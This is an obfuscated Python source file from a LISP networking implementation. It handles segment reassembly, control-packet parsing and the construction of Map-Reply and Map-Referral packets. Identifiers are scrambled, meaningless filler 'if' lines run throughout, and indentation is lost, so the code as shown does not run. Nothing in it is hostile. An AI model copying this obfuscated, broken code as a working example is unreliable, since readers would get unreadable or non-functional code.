if 71 - 71: o0oOOo0O0Ooo * II111iiii / OOooOOo . OoO0O00
if 73 - 73: I1Ii111 * OoO0O00 / OoOoOO00 . II111iiii
if 87 - 87: OoO0O00 + Oo0Ooo + O0 % OoooooooOO - iIii1I11I1II1
if 100 - 100: Oo0Ooo + IiII
if 81 - 81: iIii1I11I1II1 + iIii1I11I1II1
if 19 - 19: ooOoO0o + i1IIi / Oo0Ooo * II111iiii * I1Ii111 / ooOoO0o
if 23 - 23: I1Ii111
if 76 - 76: Ii1I + Ii1I / i1IIi % o0oOOo0O0Ooo . iIii1I11I1II1 . OoOoOO00
def lisp_receive_segments ( lisp_socket , packet , source , total_length ) :
if 75 - 75: I11i . Ii1I / I1ii11iIi11i
if 99 - 99: Ii1I
if 85 - 85: I1Ii111 + I1Ii111 + OoOoOO00 / ooOoO0o / o0oOOo0O0Ooo . Oo0Ooo
if 41 - 41: i1IIi % Ii1I . i1IIi * OoooooooOO % Ii1I
if 21 - 21: iII111i
O0IIiIi = total_length - len ( packet )
if ( O0IIiIi == 0 ) : return ( [ True , packet ] )
if 72 - 72: I11i % o0oOOo0O0Ooo . iIii1I11I1II1 - I1Ii111 / i11iIiiIii
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( packet ) ,
total_length , source ) )
if 75 - 75: OoooooooOO
if 24 - 24: oO0o % iII111i - II111iiii / Ii1I + O0
if 37 - 37: I1Ii111 - i1IIi / iIii1I11I1II1
if 53 - 53: Ii1I - iIii1I11I1II1 % I1ii11iIi11i * i11iIiiIii + ooOoO0o
if 63 - 63: Oo0Ooo * I1IiiI
oOOoO0O = O0IIiIi
while ( oOOoO0O > 0 ) :
try : O0OO0O = lisp_socket . recvfrom ( 9000 )
except : return ( [ False , None ] )
if 84 - 84: Oo0Ooo
O0OO0O = O0OO0O [ 0 ]
if 67 - 67: oO0o / II111iiii . I11i / oO0o
if 46 - 46: oO0o * Oo0Ooo - I11i / iIii1I11I1II1
if 100 - 100: i11iIiiIii % oO0o
if 62 - 62: OOooOOo * i1IIi - OOooOOo / i11iIiiIii
if 17 - 17: I1ii11iIi11i + ooOoO0o % Ii1I % OOooOOo
if ( O0OO0O . find ( "packet@" ) == 0 ) :
oOOO0OO0OO = O0OO0O . split ( "@" )
lprint ( "Received new message ({}-out-of-{}) while receiving " + "fragments, old message discarded" , len ( O0OO0O ) ,
# I1ii11iIi11i % i1IIi - Oo0Ooo - IiII - o0oOOo0O0Ooo . OoooooooOO
oOOO0OO0OO [ 1 ] if len ( oOOO0OO0OO ) > 2 else "?" )
return ( [ False , O0OO0O ] )
if 15 - 15: iIii1I11I1II1 / Ii1I + i1IIi
if 68 - 68: ooOoO0o - i1IIi
oOOoO0O -= len ( O0OO0O )
packet += O0OO0O
if 61 - 61: II111iiii * I1ii11iIi11i / I11i / OoO0O00
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( O0OO0O ) , total_length , source ) )
if 44 - 44: O0 + OoOoOO00 . iIii1I11I1II1 . IiII
if 2 - 2: iII111i
return ( [ True , packet ] )
if 47 - 47: i1IIi % I11i
if 17 - 17: OoOoOO00 - iII111i % I11i / o0oOOo0O0Ooo / II111iiii
if 22 - 22: Oo0Ooo + I1ii11iIi11i % i11iIiiIii . OoO0O00 - I11i % I11i
if 21 - 21: I1IiiI . OoO0O00 * IiII % OoooooooOO - Oo0Ooo + Oo0Ooo
if 94 - 94: ooOoO0o
if 80 - 80: i11iIiiIii - O0 / I1Ii111 + OOooOOo % Oo0Ooo
if 95 - 95: II111iiii
if 76 - 76: OoO0O00 % iII111i * OoOoOO00 / ooOoO0o / i1IIi
def lisp_bit_stuff ( payload ) :
lprint ( "Bit-stuffing, found {} segments" . format ( len ( payload ) ) )
IiiiIi1iiii11 = ""
for O0OO0O in payload : IiiiIi1iiii11 += O0OO0O + "\x40"
return ( IiiiIi1iiii11 [ : - 1 ] )
if 45 - 45: Ii1I . I11i * I1Ii111 . i11iIiiIii
if 34 - 34: O0 * o0oOOo0O0Ooo / IiII
if 75 - 75: I1Ii111 - i1IIi - OoO0O00
if 25 - 25: iII111i . o0oOOo0O0Ooo
if 62 - 62: I11i + i1IIi . I1ii11iIi11i - I1ii11iIi11i
if 68 - 68: ooOoO0o % OoooooooOO
if 94 - 94: Oo0Ooo * o0oOOo0O0Ooo
if 60 - 60: iII111i . OOooOOo
if 39 - 39: O0 - i11iIiiIii - I1IiiI / Oo0Ooo - i11iIiiIii
if 30 - 30: OoO0O00 / OoOoOO00 + I1ii11iIi11i % IiII - OoO0O00
if 19 - 19: I1IiiI
if 99 - 99: OOooOOo - OOooOOo
if 98 - 98: o0oOOo0O0Ooo + O0 * oO0o - i11iIiiIii
if 83 - 83: o0oOOo0O0Ooo
if 23 - 23: o0oOOo0O0Ooo . I11i
if 67 - 67: iII111i
if 52 - 52: IiII . OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / IiII . OoooooooOO . Oo0Ooo / ooOoO0o + O0
if 38 - 38: I11i
if 66 - 66: II111iiii
def lisp_receive ( lisp_socket , internal ) :
while ( True ) :
if 57 - 57: OoO0O00 / Oo0Ooo % I1IiiI * I1ii11iIi11i
if 68 - 68: iII111i - o0oOOo0O0Ooo - OoO0O00 . O0 - i11iIiiIii
if 2 - 2: I1ii11iIi11i * i1IIi
if 17 - 17: I1ii11iIi11i * Ii1I % Oo0Ooo * I1Ii111 + OoO0O00 . OoooooooOO
try : o0o = lisp_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
if 36 - 36: IiII . iII111i * O0 . i1IIi * O0 * I1Ii111
if 50 - 50: OoooooooOO + o0oOOo0O0Ooo + iIii1I11I1II1 + OOooOOo
if 90 - 90: Ii1I * I11i % I1Ii111 - I1ii11iIi11i * I1Ii111 % OoO0O00
if 50 - 50: iIii1I11I1II1
if 56 - 56: oO0o
if 55 - 55: iIii1I11I1II1 % oO0o % OOooOOo / I1Ii111 * OoooooooOO / Oo0Ooo
if ( internal == False ) :
IiiiIi1iiii11 = o0o [ 0 ]
iI1Iii1i1 = lisp_convert_6to4 ( o0o [ 1 ] [ 0 ] )
Oo0o = o0o [ 1 ] [ 1 ]
if 88 - 88: I11i + OoO0O00 . iIii1I11I1II1 . II111iiii
if ( Oo0o == LISP_DATA_PORT ) :
O0000000 = lisp_data_plane_logging
OO0OOo = lisp_format_packet ( IiiiIi1iiii11 [ 0 : 60 ] ) + " ..."
else :
O0000000 = True
OO0OOo = lisp_format_packet ( IiiiIi1iiii11 )
if 15 - 15: i1IIi
if 43 - 43: II111iiii + OOooOOo . i11iIiiIii - II111iiii
if ( O0000000 ) :
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Receive" ,
False ) , len ( IiiiIi1iiii11 ) , bold ( "from " + iI1Iii1i1 , False ) , Oo0o ,
OO0OOo ) )
if 80 - 80: o0oOOo0O0Ooo . oO0o . I1Ii111
return ( [ "packet" , iI1Iii1i1 , Oo0o , IiiiIi1iiii11 ] )
if 26 - 26: i1IIi - I1IiiI + IiII / OoO0O00 . I1ii11iIi11i
if 82 - 82: I1Ii111 % iII111i . OoOoOO00 % OoO0O00 + I1ii11iIi11i
if 69 - 69: I1IiiI * OoOoOO00 - ooOoO0o . O0
if 15 - 15: oO0o . IiII + I1Ii111 - OoooooooOO
if 85 - 85: II111iiii - Oo0Ooo + oO0o . i11iIiiIii + Oo0Ooo
if 86 - 86: ooOoO0o . OoO0O00
i1i1i11i11 = False
oOO00o0 = o0o [ 0 ]
I1II1i = False
if 53 - 53: IiII * I1ii11iIi11i
while ( i1i1i11i11 == False ) :
oOO00o0 = oOO00o0 . split ( "@" )
if 64 - 64: OOooOOo + Oo0Ooo . OoOoOO00 . OOooOOo + i11iIiiIii
if ( len ( oOO00o0 ) < 4 ) :
lprint ( "Possible fragment (length {}), from old message, " + "discarding" , len ( oOO00o0 [ 0 ] ) )
if 7 - 7: ooOoO0o * I11i / iIii1I11I1II1
I1II1i = True
break
if 15 - 15: OoooooooOO / iII111i
if 40 - 40: o0oOOo0O0Ooo
OO0Oo0o0o = oOO00o0 [ 0 ]
try :
Iii1 = int ( oOO00o0 [ 1 ] )
except :
oo0Ooo = bold ( "Internal packet reassembly error" , False )
lprint ( "{}: {}" . format ( oo0Ooo , o0o ) )
I1II1i = True
break
if 15 - 15: i11iIiiIii % iIii1I11I1II1 . II111iiii * I11i / I11i
iI1Iii1i1 = oOO00o0 [ 2 ]
Oo0o = oOO00o0 [ 3 ]
if 80 - 80: Ii1I % II111iiii
if 4 - 4: OoOoOO00 * OOooOOo / OoooooooOO % OoOoOO00 * I1ii11iIi11i * o0oOOo0O0Ooo
if 69 - 69: O0 % iIii1I11I1II1
if 94 - 94: O0
if 50 - 50: I1Ii111 * o0oOOo0O0Ooo - ooOoO0o - I1ii11iIi11i % I1IiiI . ooOoO0o
if 35 - 35: Ii1I % i1IIi + I1IiiI
if 51 - 51: I1Ii111 / iIii1I11I1II1 + i1IIi
if 71 - 71: iIii1I11I1II1 * ooOoO0o % iIii1I11I1II1 % I1IiiI
if ( len ( oOO00o0 ) > 5 ) :
IiiiIi1iiii11 = lisp_bit_stuff ( oOO00o0 [ 4 : : ] )
else :
IiiiIi1iiii11 = oOO00o0 [ 4 ]
if 75 - 75: I1IiiI
if 33 - 33: OoOoOO00
if 53 - 53: i11iIiiIii / i1IIi . i1IIi + I11i
if 19 - 19: ooOoO0o . OoOoOO00 + Oo0Ooo + iIii1I11I1II1 . OoOoOO00 - I1IiiI
if 70 - 70: OOooOOo . OoOoOO00 . OOooOOo / iII111i
if 72 - 72: OoooooooOO + Ii1I + iIii1I11I1II1
i1i1i11i11 , IiiiIi1iiii11 = lisp_receive_segments ( lisp_socket , IiiiIi1iiii11 ,
iI1Iii1i1 , Iii1 )
if ( IiiiIi1iiii11 == None ) : return ( [ "" , "" , "" , "" ] )
if 13 - 13: iII111i . I1Ii111 % ooOoO0o / i1IIi
if 64 - 64: iII111i
if 9 - 9: I1ii11iIi11i + Oo0Ooo * I11i / I1Ii111 / I1ii11iIi11i / oO0o
if 48 - 48: Oo0Ooo % i1IIi / I1ii11iIi11i / oO0o + iII111i
if 47 - 47: Ii1I
if ( i1i1i11i11 == False ) :
oOO00o0 = IiiiIi1iiii11
continue
if 75 - 75: II111iiii / OoOoOO00 - o0oOOo0O0Ooo % I1ii11iIi11i + OoO0O00
if 7 - 7: iII111i - OoO0O00 + ooOoO0o * iII111i
if ( Oo0o == "" ) : Oo0o = "no-port"
if ( OO0Oo0o0o == "command" and lisp_i_am_core == False ) :
ooo = IiiiIi1iiii11 . find ( " {" )
iIiI1ii1I = IiiiIi1iiii11 if ooo == - 1 else IiiiIi1iiii11 [ : ooo ]
iIiI1ii1I = ": '" + iIiI1ii1I + "'"
else :
iIiI1ii1I = ""
if 5 - 5: OoooooooOO / IiII / I1ii11iIi11i / OoO0O00 * i1IIi / iIii1I11I1II1
if 32 - 32: I1Ii111 % Oo0Ooo / OoOoOO00 + OoOoOO00 % i11iIiiIii . OoO0O00
lprint ( "{} {} bytes {} {}, {}{}" . format ( bold ( "Receive" , False ) ,
len ( IiiiIi1iiii11 ) , bold ( "from " + iI1Iii1i1 , False ) , Oo0o , OO0Oo0o0o ,
iIiI1ii1I if ( OO0Oo0o0o in [ "command" , "api" ] ) else ": ... " if ( OO0Oo0o0o == "data-packet" ) else ": " + lisp_format_packet ( IiiiIi1iiii11 ) ) )
if 42 - 42: OoO0O00 % ooOoO0o . I11i + ooOoO0o . iIii1I11I1II1 * ooOoO0o
if 79 - 79: I1ii11iIi11i . IiII * IiII - o0oOOo0O0Ooo
if 49 - 49: iIii1I11I1II1 % Ii1I / OoooooooOO - II111iiii . Ii1I
if 65 - 65: OoooooooOO + I1Ii111 % ooOoO0o + II111iiii . i1IIi + OoooooooOO
if 26 - 26: I1IiiI / II111iiii % I1ii11iIi11i * o0oOOo0O0Ooo . IiII / OoO0O00
if ( I1II1i ) : continue
return ( [ OO0Oo0o0o , iI1Iii1i1 , Oo0o , IiiiIi1iiii11 ] )
if 10 - 10: i11iIiiIii / i1IIi + O0 - i11iIiiIii % I11i - i1IIi
if 38 - 38: O0 - I1IiiI + Oo0Ooo + ooOoO0o
if 56 - 56: I1Ii111 + oO0o / Ii1I + I1Ii111
if 21 - 21: OOooOOo / OoOoOO00 + OoOoOO00 + OoOoOO00 - i1IIi + Ii1I
if 43 - 43: O0 % II111iiii
if 60 - 60: iII111i / ooOoO0o - Ii1I - OoooooooOO
if 79 - 79: oO0o / iII111i . iIii1I11I1II1 * i11iIiiIii * i1IIi . iIii1I11I1II1
if 31 - 31: OoooooooOO / ooOoO0o / OoooooooOO + ooOoO0o . O0 - IiII
def lisp_parse_packet ( lisp_sockets , packet , source , udp_sport , ttl = - 1 ) :
oO0000o00OO = False
II1IIII = time . time ( )
if 24 - 24: I1ii11iIi11i * i11iIiiIii + OoooooooOO
O00O0OO = lisp_control_header ( )
if ( O00O0OO . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return ( oO0000o00OO )
if 20 - 20: OOooOOo / O0
if 51 - 51: ooOoO0o - I1Ii111 * oO0o
if 47 - 47: Oo0Ooo % OoO0O00 * Ii1I / OoOoOO00
if 1 - 1: I1IiiI
if 68 - 68: ooOoO0o
o00o0OOO000 = source
if ( source . find ( "lisp" ) == - 1 ) :
OO0o0OO0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OO0o0OO0 . string_to_afi ( source )
OO0o0OO0 . store_address ( source )
source = OO0o0OO0
if 43 - 43: I1Ii111
if 53 - 53: I1Ii111 + ooOoO0o - iII111i + I1ii11iIi11i * iII111i
if ( O00O0OO . type == LISP_MAP_REQUEST ) :
lisp_process_map_request ( lisp_sockets , packet , None , 0 , source ,
udp_sport , False , ttl , II1IIII )
if 95 - 95: OoO0O00 * OoOoOO00 / i1IIi / iII111i + IiII - Ii1I
elif ( O00O0OO . type == LISP_MAP_REPLY ) :
lisp_process_map_reply ( lisp_sockets , packet , source , ttl , II1IIII )
if 36 - 36: II111iiii * OoO0O00 + I11i
elif ( O00O0OO . type == LISP_MAP_REGISTER ) :
lisp_process_map_register ( lisp_sockets , packet , source , udp_sport )
if 39 - 39: II111iiii - OoO0O00
elif ( O00O0OO . type == LISP_MAP_NOTIFY ) :
if ( o00o0OOO000 == "lisp-etr" ) :
lisp_process_multicast_map_notify ( packet , source )
else :
if ( lisp_is_running ( "lisp-rtr" ) ) :
lisp_process_multicast_map_notify ( packet , source )
if 8 - 8: I11i - OoO0O00 / II111iiii
lisp_process_map_notify ( lisp_sockets , packet , source )
if 32 - 32: oO0o
if 26 - 26: OoOoOO00 / i11iIiiIii - OOooOOo % oO0o % I1IiiI
elif ( O00O0OO . type == LISP_MAP_NOTIFY_ACK ) :
lisp_process_map_notify_ack ( packet , source )
if 23 - 23: i11iIiiIii / iII111i + IiII / i11iIiiIii
elif ( O00O0OO . type == LISP_MAP_REFERRAL ) :
lisp_process_map_referral ( lisp_sockets , packet , source )
if 97 - 97: o0oOOo0O0Ooo + o0oOOo0O0Ooo / I1ii11iIi11i * OoooooooOO
elif ( O00O0OO . type == LISP_NAT_INFO and O00O0OO . is_info_reply ( ) ) :
oOo0oo , IIIi1i1iIIIi , oO0000o00OO = lisp_process_info_reply ( source , packet , True )
if 61 - 61: I1IiiI - I11i
elif ( O00O0OO . type == LISP_NAT_INFO and O00O0OO . is_info_reply ( ) == False ) :
oo0o00OO = source . print_address_no_iid ( )
lisp_process_info_request ( lisp_sockets , packet , oo0o00OO , udp_sport ,
None )
if 5 - 5: i11iIiiIii % i1IIi / IiII * i11iIiiIii . i1IIi * iII111i
elif ( O00O0OO . type == LISP_ECM ) :
lisp_process_ecm ( lisp_sockets , packet , source , udp_sport )
if 71 - 71: i11iIiiIii / iIii1I11I1II1 % i1IIi + oO0o - i1IIi + II111iiii
else :
lprint ( "Invalid LISP control packet type {}" . format ( O00O0OO . type ) )
if 40 - 40: OOooOOo + ooOoO0o
return ( oO0000o00OO )
if 96 - 96: i11iIiiIii + IiII / iIii1I11I1II1
if 49 - 49: OoOoOO00 - I1ii11iIi11i . I11i % II111iiii % iII111i
if 6 - 6: OoooooooOO
if 49 - 49: iII111i
if 12 - 12: Oo0Ooo / II111iiii * OoOoOO00 * i1IIi - i1IIi / iII111i
if 43 - 43: I1IiiI / IiII
if 38 - 38: I1ii11iIi11i + i11iIiiIii * I1IiiI % oO0o % OoooooooOO
def lisp_process_rloc_probe_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp ) :
if 4 - 4: OoO0O00 . I1IiiI - O0 % iII111i . OOooOOo
IiI1i1i1 = bold ( "RLOC-probe" , False )
if 69 - 69: OoooooooOO
if ( lisp_i_am_etr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( IiI1i1i1 ) )
lisp_etr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp )
return
if 19 - 19: O0 + iIii1I11I1II1 / OoOoOO00 / oO0o + II111iiii - OOooOOo
if 70 - 70: i1IIi * o0oOOo0O0Ooo + I1Ii111 . ooOoO0o - O0 + i11iIiiIii
if ( lisp_i_am_rtr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( IiI1i1i1 ) )
lisp_rtr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp )
return
if 81 - 81: iIii1I11I1II1 - OoO0O00 . i11iIiiIii
if 4 - 4: o0oOOo0O0Ooo / OoO0O00 - I11i
lprint ( "Ignoring received {} Map-Request, not an ETR or RTR" . format ( IiI1i1i1 ) )
return
if 52 - 52: II111iiii . iII111i
if 36 - 36: I1IiiI * II111iiii
if 68 - 68: oO0o * o0oOOo0O0Ooo + OoooooooOO - I1ii11iIi11i * i1IIi % OOooOOo
if 39 - 39: I1Ii111 / I11i + oO0o / I1Ii111 % IiII * I1ii11iIi11i
if 66 - 66: I1ii11iIi11i * ooOoO0o . i11iIiiIii * Oo0Ooo - I11i . I1IiiI
def lisp_process_smr ( map_request ) :
lprint ( "Received SMR-based Map-Request" )
return
if 43 - 43: I11i . iII111i . IiII - oO0o
if 60 - 60: i1IIi + iII111i * i1IIi . iII111i
if 40 - 40: i1IIi . OoO0O00
if 65 - 65: Oo0Ooo
if 81 - 81: OOooOOo % OoooooooOO / IiII . Oo0Ooo - ooOoO0o . I1IiiI
def lisp_process_smr_invoked_request ( map_request ) :
lprint ( "Received SMR-invoked Map-Request" )
return
if 3 - 3: O0
if 95 - 95: i11iIiiIii
if 100 - 100: iIii1I11I1II1 * I1IiiI * Ii1I * i1IIi . I1Ii111 * I1IiiI
if 54 - 54: o0oOOo0O0Ooo / iII111i + IiII - o0oOOo0O0Ooo - I11i
if 28 - 28: I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo * IiII + OoooooooOO
if 52 - 52: I1Ii111
if 86 - 86: O0 * IiII + OoOoOO00 + OoO0O00
def lisp_build_map_reply ( eid , group , rloc_set , nonce , action , ttl , map_request ,
keys , enc , auth , mr_ttl = - 1 ) :
if 53 - 53: I1IiiI % i11iIiiIii + o0oOOo0O0Ooo . I1ii11iIi11i
O0oOO0O00 = map_request . rloc_probe if ( map_request != None ) else False
o000OooOoo = map_request . json_telemetry if ( map_request != None ) else None
if 34 - 34: I1ii11iIi11i * Ii1I + oO0o
if 80 - 80: I1IiiI + IiII - I11i - OoO0O00 - I1IiiI % Ii1I
iI1I1ii = lisp_map_reply ( )
iI1I1ii . rloc_probe = O0oOO0O00
iI1I1ii . echo_nonce_capable = enc
iI1I1ii . hop_count = 0 if ( mr_ttl == - 1 ) else mr_ttl
iI1I1ii . record_count = 1
iI1I1ii . nonce = nonce
IiiiIi1iiii11 = iI1I1ii . encode ( )
iI1I1ii . print_map_reply ( )
if 45 - 45: iII111i % I1ii11iIi11i / i11iIiiIii - II111iiii . Oo0Ooo / ooOoO0o
oO000oOoO0 = lisp_eid_record ( )
oO000oOoO0 . rloc_count = len ( rloc_set )
if ( o000OooOoo != None ) : oO000oOoO0 . rloc_count += 1
oO000oOoO0 . authoritative = auth
oO000oOoO0 . record_ttl = ttl
oO000oOoO0 . action = action
oO000oOoO0 . eid = eid
oO000oOoO0 . group = group
if 66 - 66: Oo0Ooo . I1Ii111 / I1Ii111
IiiiIi1iiii11 += oO000oOoO0 . encode ( )
oO000oOoO0 . print_record ( " " , False )
if 78 - 78: I11i / I1IiiI . Ii1I
O0OoooO = lisp_get_all_addresses ( ) + lisp_get_all_translated_rlocs ( )
if 12 - 12: OoOoOO00 / iII111i * II111iiii . Oo0Ooo
OOO000 = None
for o0oO0O00 in rloc_set :
I1Ii11iI = o0oO0O00 . rloc . is_multicast_address ( )
oOOo = lisp_rloc_record ( )
iIIo00O000O = O0oOO0O00 and ( I1Ii11iI or o000OooOoo == None )
oo0o00OO = o0oO0O00 . rloc . print_address_no_iid ( )
if ( oo0o00OO in O0OoooO or I1Ii11iI ) :
oOOo . local_bit = True
oOOo . probe_bit = iIIo00O000O
oOOo . keys = keys
if ( o0oO0O00 . priority == 254 and lisp_i_am_rtr ) :
oOOo . rloc_name = "RTR"
if 53 - 53: ooOoO0o * oO0o - O0 . Ii1I + I1ii11iIi11i - O0
if ( OOO000 == None ) : OOO000 = o0oO0O00 . rloc
if 37 - 37: OoO0O00 . i11iIiiIii
oOOo . store_rloc_entry ( o0oO0O00 )
oOOo . reach_bit = True
oOOo . print_record ( " " )
IiiiIi1iiii11 += oOOo . encode ( )
if 62 - 62: i1IIi % i1IIi
if 58 - 58: OoooooooOO - i11iIiiIii
if 67 - 67: OoO0O00 - OoooooooOO
if 66 - 66: oO0o - II111iiii - o0oOOo0O0Ooo * OoO0O00 % OoO0O00 + I11i
if 28 - 28: i11iIiiIii . o0oOOo0O0Ooo / II111iiii . OoO0O00 % II111iiii / I11i
if ( o000OooOoo != None ) :
oOOo = lisp_rloc_record ( )
if ( OOO000 ) : oOOo . rloc . copy_address ( OOO000 )
oOOo . local_bit = True
oOOo . probe_bit = True
oOOo . reach_bit = True
iI = lisp_encode_telemetry ( o000OooOoo , eo = str ( time . time ( ) ) )
oOOo . json = lisp_json ( "telemetry" , iI )
oOOo . print_record ( " " )
IiiiIi1iiii11 += oOOo . encode ( )
if 56 - 56: Ii1I % OoO0O00 - I1ii11iIi11i / o0oOOo0O0Ooo - OOooOOo
return ( IiiiIi1iiii11 )
if 55 - 55: II111iiii * I1IiiI - o0oOOo0O0Ooo
if 67 - 67: Oo0Ooo * oO0o
if 99 - 99: i1IIi % I1IiiI % I1IiiI + iIii1I11I1II1
if 62 - 62: OoooooooOO
if 38 - 38: iII111i % iII111i * ooOoO0o / OoO0O00 + ooOoO0o
if 52 - 52: ooOoO0o . iIii1I11I1II1 / iIii1I11I1II1 % oO0o - oO0o * II111iiii
if 57 - 57: I1Ii111
def lisp_build_map_referral ( eid , group , ddt_entry , action , ttl , nonce ) :
iIi11iI = lisp_map_referral ( )
iIi11iI . record_count = 1
iIi11iI . nonce = nonce
IiiiIi1iiii11 = iIi11iI . encode ( )
iIi11iI . print_map_referral ( )
if 50 - 50: o0oOOo0O0Ooo * I1IiiI
oO000oOoO0 = lisp_eid_record ( )
if 51 - 51: II111iiii
I1i1III1I1 = 0
if ( ddt_entry == None ) :
oO000oOoO0 . eid = eid
oO000oOoO0 . group = group
else :
I1i1III1I1 = len ( ddt_entry . delegation_set )
oO000oOoO0 . eid = ddt_entry . eid
oO000oOoO0 . group = ddt_entry . group
ddt_entry . map_referrals_sent += 1
if 51 - 51: IiII . iII111i + Oo0Ooo . I11i
oO000oOoO0 . rloc_count = I1i1III1I1
oO000oOoO0 . authoritative = True
if 66 - 66: oO0o / i1IIi
if 42 - 42: Oo0Ooo + iIii1I11I1II1
if 97 - 97: Ii1I * O0 / OoooooooOO
if 99 - 99: OoOoOO00 + Oo0Ooo . I1IiiI . oO0o
if 10 - 10: I1Ii111 + I1IiiI . iIii1I11I1II1 + IiII / i11iIiiIii - O0
Oo00OoooO0o = False
if ( action == LISP_DDT_ACTION_NULL ) :
if ( I1i1III1I1 == 0 ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
else :
I1I = ddt_entry . delegation_set [ 0 ]
if ( I1I . is_ddt_child ( ) ) :
action = LISP_DDT_ACTION_NODE_REFERRAL
if 27 - 27: OoooooooOO / I1ii11iIi11i
if ( I1I . is_ms_child ( ) ) :
action = LISP_DDT_ACTION_MS_REFERRAL
if 87 - 87: I11i + IiII / OOooOOo
if 70 - 70: II111iiii
if 21 - 21: i11iIiiIii . iII111i * O0 - iII111i
if 5 - 5: O0 . OoOoOO00 / iII111i
if 78 - 78: Ii1I - I1ii11iIi11i + iIii1I11I1II1 + OoooooooOO . OoO0O00 - ooOoO0o
if 81 - 81: o0oOOo0O0Ooo * OoooooooOO
if 32 - 32: OoOoOO00 - I11i * i11iIiiIii . I1ii11iIi11i . IiII . iIii1I11I1II1
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : Oo00OoooO0o = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
Oo00OoooO0o = ( lisp_i_am_ms and I1I . is_ms_peer ( ) == False )
if 41 - 41: iII111i / OoOoOO00 / OoO0O00 / ooOoO0o
if 16 - 16: iIii1I11I1II1 . II111iiii
oO000oOoO0 . action = action
oO000oOoO0 . ddt_incomplete = Oo00OoooO0o
oO000oOoO0 . record_ttl = ttl
if 80 - 80: Oo0Ooo + IiII
IiiiIi1iiii11 += oO000oOoO0 . encode ( )
oO000oOoO0 . print_record ( " " , True )
if 18 - 18: OoO0O00 . Oo0Ooo
if ( I1i1III1I1 == 0 ) : return ( IiiiIi1iiii11 )
if 52 - 52: OoOoOO00 . iIii1I11I1II1 / OoOoOO00
for I1I in ddt_entry . delegation_set :
oOOo = lisp_rloc_record ( )
oOOo . rloc = I1I . delegate_address
oOOo . priority = I1I . priority
oOOo . weight = I1I . weight
oOOo . mpriority = 255
oOOo . mweight = 0
oOOo . reach_bit = True
IiiiIi1iiii11 += oOOo . encode ( )
oOOo . print_record ( " " )
if 14 - 14: i1IIi
return ( IiiiIi1iiii11 )
if 63 - 63: OoOoOO00 . i11iIiiIii / IiII
if 36 - 36: OOooOOo * OoOoOO00 + i11iIiiIii + O0 + O0
if 18 - 18: Oo0Ooo . I1ii11iIi11i * ooOoO0o % Ii1I + I1ii11iIi11i
if 23 - 23: oO0o / o0oOOo0O0Ooo + I11i % IiII * OoO0O00
if 48 - 48: OoO0O00
if 30 - 30: iIii1I11I1II1
if 53 - 53: II111iiii
def lisp_etr_process_map_request ( lisp_sockets , map_request , source , sport ,
ttl , etr_in_ts ) :
if 40 - 40: Ii1I % oO0o
if ( map_request . target_group . is_null ( ) ) :
Oooo00oo = lisp_db_for_lookups . lookup_cache ( map_request . target_eid , False )
else :
Oooo00oo = lisp_db_for_lookups . lookup_cache ( map_request . target_group , False )
if ( Oooo00oo ) : Oooo00oo = Oooo00oo . lookup_source_cache ( map_request . target_eid , False )
if 51 - 51: oO0o . Oo0Ooo / i1IIi + i1IIi * i1IIi
Ii1i1 = map_request . print_prefix ( )
if 32 - 32: I1IiiI + IiII + iII111i . iIii1I11I1II1 * Ii1I
if ( Oooo00oo == None ) :
lprint ( "Database-mapping entry not found for requested EID {}" . format ( green ( Ii1i1 , False ) ) )
if 27 - 27: oO0o + Ii1I . i11iIiiIii
return
if 97 - 97: iII111i . I1IiiI
if 71 - 71: OOooOOo - IiII % oO0o * I1ii11iIi11i
iIIiIIiII111 = Oooo00oo . print_eid_tuple ( )
if 24 - 24: O0 . Oo0Ooo + O0 % Ii1I + OoooooooOO
lprint ( "Found database-mapping EID-prefix {} for requested EID {}" . format ( green ( iIIiIIiII111 , False ) , green ( Ii1i1 , False ) ) )
if 72 - 72: I1ii11iIi11i
if 100 - 100: i11iIiiIii - iII111i - I11i
if 5 - 5: oO0o % IiII * iII111i
if 98 - 98: iII111i / OOooOOo + IiII
if 100 - 100: II111iiii . i11iIiiIii / oO0o - OOooOOo + OoOoOO00 % I1ii11iIi11i
o00O00oOO00 = map_request . itr_rlocs [ 0 ]
if ( o00O00oOO00 . is_private_address ( ) and lisp_nat_traversal ) :
o00O00oOO00 = source
if 3 - 3: i1IIi * I1ii11iIi11i * II111iiii . I1ii11iIi11i
if 82 - 82: OoOoOO00
o0OOO = map_request . nonce
i11 = lisp_nonce_echoing
iIi11III = map_request . keys
if 53 - 53: OOooOOo * OoOoOO00 % iII111i
if 86 - 86: OOooOOo . OOooOOo + IiII - I1ii11iIi11i . OoO0O00
if 66 - 66: I1IiiI * OoOoOO00 . I1IiiI / Oo0Ooo - Ii1I
if 69 - 69: iIii1I11I1II1 % iII111i + ooOoO0o * i1IIi + iII111i * I1Ii111
if 67 - 67: Ii1I % Oo0Ooo - Oo0Ooo . I11i + IiII
oOooo0o = map_request . json_telemetry
if ( oOooo0o != None ) :
map_request . json_telemetry = lisp_encode_telemetry ( oOooo0o , ei = etr_in_ts )
if 45 - 45: oO0o + ooOoO0o + OOooOOo * OOooOOo * o0oOOo0O0Ooo / Oo0Ooo
if 61 - 61: OoooooooOO % i11iIiiIii . i1IIi . OOooOOo
Oooo00oo . map_replies_sent += 1
if 90 - 90: iIii1I11I1II1 - iIii1I11I1II1 % O0
IiiiIi1iiii11 = lisp_build_map_reply ( Oooo00oo . eid , Oooo00oo . group , Oooo00oo . rloc_set , o0OOO ,
LISP_NO_ACTION , 1440 , map_request , iIi11III , i11 , True , ttl )
if 43 - 43: Oo0Ooo / i1IIi % Ii1I . OoOoOO00
if 22 - 22: iIii1I11I1II1 + Ii1I
if 73 - 73: I1IiiI / OoO0O00 / OoooooooOO
